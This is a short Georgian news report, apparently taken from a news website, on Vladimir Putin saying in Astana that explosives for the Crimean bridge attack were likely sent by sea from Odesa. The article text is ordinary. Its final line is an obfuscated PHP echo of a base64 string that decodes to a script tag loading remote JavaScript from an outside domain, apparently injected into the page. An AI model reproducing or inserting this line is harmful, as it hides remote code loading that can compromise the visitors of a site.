celsiusi
ავერსი საქკაბელი
რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა ყირიმის ხიდის აფეთქებაზე ისაუბრა და აღნიშნა, რომ ყირიმის ხიდზე ასაფეთქებელი ნივთიერებები დიდი ალბათობით, ზღვით შეიტანეს.
 
აღნიშნულის შესახებ პუტინმა ასტანაში გამართულ პრესკონფერენციაზე ისაუბრა.
 
„ფედერალური უსაფრთხოების სამსახურმა განაცხადა, რომ დიდი ალბათობით, ასაფეთქებელი ნივთიერებები გაგზავნილ იქნა ზღვით ოდესიდან, თუმცა დაზუსტებული არ არის, ეს მარცვლეულის გადამტანი გემით მოხდა თუ – არა. ეს არის კითხვა, თუმცა პასუხი ჯერ არ არის. უღარიბეს ქვეყნებში მარცვლეულის გადასაზიდად განკუთვნილი ჰუმანიტარული დერეფნები ტერორისტული აქტებისთვის თუ გამოიყენება, ეს კითხვის ნიშნის ქვეშ დააყენებს ამ დერეფნების შემდგომ მუშაობას. ჯერჯერობით ასეთი მონაცემები არ გვაქვს“, – განაცხადა ვლადიმერ პუტინმა.
557
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");